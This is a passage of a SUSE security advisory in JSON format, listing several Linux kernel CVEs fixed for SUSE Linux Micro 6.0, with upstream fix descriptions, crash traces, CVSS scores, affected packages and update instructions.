"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54083"
},
{
"cve": "CVE-2023-54088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: hold queue_lock when removing blkg-\u003eq_node\n\nWhen blkg is removed from q-\u003eblkg_list from blkg_free_workfn(), queue_lock\nhas to be held, otherwise, all kinds of bugs(list corruption, hard lockup,\n..) can be triggered from blkg_destroy_all().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54088",
"url": "https://www.suse.com/security/cve/CVE-2023-54088"
},
{
"category": "external",
"summary": "SUSE Bug 1256263 for CVE-2023-54088",
"url": "https://bugzilla.suse.com/1256263"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54088"
},
{
"cve": "CVE-2023-54089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio_pmem: add the missing REQ_OP_WRITE for flush bio\n\nWhen doing mkfs.xfs on a pmem device, the following warning was\n\n ------------[ cut here ]------------\n WARNING: CPU: 2 PID: 384 at block/blk-core.c:751 submit_bio_noacct\n Modules linked in:\n CPU: 2 PID: 384 Comm: mkfs.xfs Not tainted 6.4.0-rc7+ #154\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)\n RIP: 0010:submit_bio_noacct+0x340/0x520\n ......\n Call Trace:\n \u003cTASK\u003e\n ? submit_bio_noacct+0xd5/0x520\n submit_bio+0x37/0x60\n async_pmem_flush+0x79/0xa0\n nvdimm_flush+0x17/0x40\n pmem_submit_bio+0x370/0x390\n __submit_bio+0xbc/0x190\n submit_bio_noacct_nocheck+0x14d/0x370\n submit_bio_noacct+0x1ef/0x520\n submit_bio+0x55/0x60\n submit_bio_wait+0x5a/0xc0\n blkdev_issue_flush+0x44/0x60\n\nThe root cause is that submit_bio_noacct() needs bio_op() is either\nWRITE or ZONE_APPEND for flush bio and async_pmem_flush() doesn\u0027t assign\nREQ_OP_WRITE when allocating flush bio, so submit_bio_noacct just fail\nthe flush bio.\n\nSimply fix it by adding the missing REQ_OP_WRITE for flush bio. And we\ncould fix the flush order issue and do flush optimization later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54089",
"url": "https://www.suse.com/security/cve/CVE-2023-54089"
},
{
"category": "external",
"summary": "SUSE Bug 1256268 for CVE-2023-54089",
"url": "https://bugzilla.suse.com/1256268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54089"
},
{
"cve": "CVE-2023-54091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: Fix memory leak in drm_client_target_cloned\n\ndmt_mode is allocated and never freed in this function.\nIt was found with the ast driver, but most drivers using generic fbdev\nsetup are probably affected.\n\nThis fixes the following kmemleak report:\n backtrace:\n [\u003c00000000b391296d\u003e] drm_mode_duplicate+0x45/0x220 [drm]\n [\u003c00000000e45bb5b3\u003e] drm_client_target_cloned.constprop.0+0x27b/0x480 [drm]\n [\u003c00000000ed2d3a37\u003e] drm_client_modeset_probe+0x6bd/0xf50 [drm]\n [\u003c0000000010e5cc9d\u003e] __drm_fb_helper_initial_config_and_unlock+0xb4/0x2c0 [drm_kms_helper]\n [\u003c00000000909f82ca\u003e] drm_fbdev_client_hotplug+0x2bc/0x4d0 [drm_kms_helper]\n [\u003c00000000063a69aa\u003e] drm_client_register+0x169/0x240 [drm]\n [\u003c00000000a8c61525\u003e] ast_pci_probe+0x142/0x190 [ast]\n [\u003c00000000987f19bb\u003e] local_pci_probe+0xdc/0x180\n [\u003c000000004fca231b\u003e] work_for_cpu_fn+0x4e/0xa0\n [\u003c0000000000b85301\u003e] process_one_work+0x8b7/0x1540\n [\u003c000000003375b17c\u003e] worker_thread+0x70a/0xed0\n [\u003c00000000b0d43cd9\u003e] kthread+0x29f/0x340\n [\u003c000000008d770833\u003e] ret_from_fork+0x1f/0x30\nunreferenced object 0xff11000333089a00 (size 128):",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54091",
"url": "https://www.suse.com/security/cve/CVE-2023-54091"
},
{
"category": "external",
"summary": "SUSE Bug 1256274 for CVE-2023-54091",
"url": "https://bugzilla.suse.com/1256274"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54091"
},
{
"cve": "CVE-2023-54092",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54092"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: s390: pv: fix index value of replaced ASCE\n\nThe index field of the struct page corresponding to a guest ASCE should\nbe 0. When replacing the ASCE in s390_replace_asce(), the index of the\nnew ASCE should also be set to 0.\n\nHaving the wrong index might lead to the wrong addresses being passed\naround when notifying pte invalidations, and eventually to validity\nintercepts (VM crash) if the prefix gets unmapped and the notifier gets\ncalled with the wrong address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54092",
"url": "https://www.suse.com/security/cve/CVE-2023-54092"
},
{
"category": "external",
"summary": "SUSE Bug 1256370 for CVE-2023-54092",
"url": "https://bugzilla.suse.com/1256370"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54092"
},
{
"cve": "CVE-2023-54093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: anysee: fix null-ptr-deref in anysee_master_xfer\n\nIn anysee_master_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach anysee_master_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")\n\n[hverkuil: add spaces around +]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54093",
"url": "https://www.suse.com/security/cve/CVE-2023-54093"
},
{
"category": "external",
"summary": "SUSE Bug 1256273 for CVE-2023-54093",
"url": "https://bugzilla.suse.com/1256273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54093"
},
{
"cve": "CVE-2023-54094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: prevent skb corruption on frag list segmentation\n\nIan reported several skb corruptions triggered by rx-gro-list,\ncollecting different oops alike:\n\n[ 62.624003] BUG: kernel NULL pointer dereference, address: 00000000000000c0\n[ 62.631083] #PF: supervisor read access in kernel mode\n[ 62.636312] #PF: error_code(0x0000) - not-present page\n[ 62.641541] PGD 0 P4D 0\n[ 62.644174] Oops: 0000 [#1] PREEMPT SMP NOPTI\n[ 62.648629] CPU: 1 PID: 913 Comm: napi/eno2-79 Not tainted 6.4.0 #364\n[ 62.655162] Hardware name: Supermicro Super Server/A2SDi-12C-HLN4F, BIOS 1.7a 10/13/2022\n[ 62.663344] RIP: 0010:__udp_gso_segment (./include/linux/skbuff.h:2858\n./include/linux/udp.h:23 net/ipv4/udp_offload.c:228 net/ipv4/udp_offload.c:261\nnet/ipv4/udp_offload.c:277)\n[ 62.687193] RSP: 0018:ffffbd3a83b4f868 EFLAGS: 00010246\n[ 62.692515] RAX: 00000000000000ce RBX: 0000000000000000 RCX: 0000000000000000\n[ 62.699743] RDX: ffffa124def8a000 RSI: 0000000000000079 RDI: ffffa125952a14d4\n[ 62.706970] RBP: ffffa124def8a000 R08: 0000000000000022 R09: 00002000001558c9\n[ 62.714199] R10: 0000000000000000 R11: 00000000be554639 R12: 00000000000000e2\n[ 62.721426] R13: ffffa125952a1400 R14: ffffa125952a1400 R15: 00002000001558c9\n[ 62.728654] FS: 0000000000000000(0000) GS:ffffa127efa40000(0000)\nknlGS:0000000000000000\n[ 62.736852] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 62.742702] CR2: 00000000000000c0 CR3: 00000001034b0000 CR4: 00000000003526e0\n[ 62.749948] Call Trace:\n[ 62.752498] \u003cTASK\u003e\n[ 62.779267] inet_gso_segment (net/ipv4/af_inet.c:1398)\n[ 62.787605] skb_mac_gso_segment (net/core/gro.c:141)\n[ 62.791906] __skb_gso_segment (net/core/dev.c:3403 (discriminator 2))\n[ 62.800492] validate_xmit_skb (./include/linux/netdevice.h:4862\nnet/core/dev.c:3659)\n[ 62.804695] validate_xmit_skb_list (net/core/dev.c:3710)\n[ 62.809158] sch_direct_xmit (net/sched/sch_generic.c:330)\n[ 62.813198] __dev_queue_xmit (net/core/dev.c:3805 net/core/dev.c:4210)\nnet/netfilter/core.c:626)\n[ 62.821093] br_dev_queue_push_xmit (net/bridge/br_forward.c:55)\n[ 62.825652] maybe_deliver (net/bridge/br_forward.c:193)\n[ 62.829420] br_flood (net/bridge/br_forward.c:233)\n[ 62.832758] br_handle_frame_finish (net/bridge/br_input.c:215)\n[ 62.837403] br_handle_frame (net/bridge/br_input.c:298\nnet/bridge/br_input.c:416)\n[ 62.851417] __netif_receive_skb_core.constprop.0 (net/core/dev.c:5387)\n[ 62.866114] __netif_receive_skb_list_core (net/core/dev.c:5570)\n[ 62.871367] netif_receive_skb_list_internal (net/core/dev.c:5638\nnet/core/dev.c:5727)\n[ 62.876795] napi_complete_done (./include/linux/list.h:37\n./include/net/gro.h:434 ./include/net/gro.h:429 net/core/dev.c:6067)\n[ 62.881004] ixgbe_poll (drivers/net/ethernet/intel/ixgbe/ixgbe_main.c:3191)\n[ 62.893534] __napi_poll (net/core/dev.c:6498)\n[ 62.897133] napi_threaded_poll (./include/linux/netpoll.h:89\nnet/core/dev.c:6640)\n[ 62.905276] kthread (kernel/kthread.c:379)\n[ 62.913435] ret_from_fork (arch/x86/entry/entry_64.S:314)\n[ 62.917119] \u003c/TASK\u003e\n\nIn the critical scenario, rx-gro-list GRO-ed packets are fed, via a\nbridge, both to the local input path and to an egress device (tun).\n\nThe segmentation of such packets unsafely writes to the cloned skbs\nwith shared heads.\n\nThis change addresses the issue by uncloning as needed the\nto-be-segmented skbs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54094",
"url": "https://www.suse.com/security/cve/CVE-2023-54094"
},
{
"category": "external",
"summary": "SUSE Bug 1256292 for CVE-2023-54094",
"url": "https://bugzilla.suse.com/1256292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
